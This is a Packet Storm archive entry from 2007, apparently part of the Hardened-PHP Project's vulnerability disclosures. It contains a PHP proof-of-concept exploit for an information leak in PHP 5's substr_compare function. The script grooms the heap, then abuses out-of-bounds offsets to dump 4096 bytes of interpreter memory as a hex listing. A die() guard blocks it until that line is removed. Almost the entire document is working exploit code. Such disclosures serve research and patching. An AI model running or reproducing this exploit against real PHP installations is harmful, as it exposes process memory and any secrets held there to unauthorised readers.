MOPB-substr.txt

2007-03-20T00:00:00
ID PACKETSTORM:55174
Type packetstorm
Reporter Stefan Esser
Modified 2007-03-20T00:00:00

Description

                                        
                                            `<?php  
////////////////////////////////////////////////////////////////////////  
// _ _ _ _ ___ _ _ ___ //  
// | || | __ _ _ _ __| | ___ _ _ ___ __| | ___ | _ \| || || _ \ //  
// | __ |/ _` || '_|/ _` |/ -_)| ' \ / -_)/ _` ||___|| _/| __ || _/ //  
// |_||_|\__,_||_| \__,_|\___||_||_|\___|\__,_| |_| |_||_||_| //  
// //  
// Proof of concept code from the Hardened-PHP Project //  
// (C) Copyright 2007 Stefan Esser //  
// //  
////////////////////////////////////////////////////////////////////////  
// PHP 5 - substr_compare Information Leak Vulnerability //  
////////////////////////////////////////////////////////////////////////  
  
// This is meant as a protection against remote file inclusion.  
die("REMOVE THIS LINE");  
  
$sizeofHashtable = 39;  
$maxlong = 0x7fffffff;  
if (is_int($maxlong+1)) {  
$sizeofHashtable = 67;  
$maxlong = 0x7fffffffffffffff;  
}  
  
$memdump = str_repeat("A", 4096);  
for ($i=0; $i<40; $i++) $d[] = array();  
unset($d[20]);  
$x = str_repeat("A", $sizeofHashtable);  
  
// If the libc memcmp leaks the information use it  
// otherwise we only get a case insensitive memdump  
$b = substr_compare(chr(65),chr(0),0,1,false) != 65;  
  
for ($i=0; $i<4096; $i++) {  
$y = substr_compare($x, chr(0), $i+1, $maxlong, $b);  
$Y = substr_compare($x, chr(1), $i+1, $maxlong, $b);  
if ($y-$Y == 1 || $Y-$y==1){  
$y = chr($y);  
if ($b && strtoupper($y)!=$y) {  
if (substr_compare($x, $y, $i+1, $maxlong, false)==-1) {  
$y = strtoupper($y);  
}  
}  
$memdump[$i] = $y;  
} else {  
$memdump[$i] = chr(0);  
}  
}  
  
echo "memdump\n---------\n\n";  
  
for ($b=0; $b<strlen($memdump); $b+=16) {  
printf("%08x: ", $b);  
for ($i=0; $i<16; $i++) {  
printf ("%02x ", ord($memdump[$b+$i]));  
}  
for ($i=0; $i<16; $i++) {  
$c = ord($memdump[$b+$i]);  
if ($c >= 127 || $c < 32) {  
$c = ord(".");  
}  
printf ("%c", $c);  
}  
printf("\n");  
}  
  
?>  
`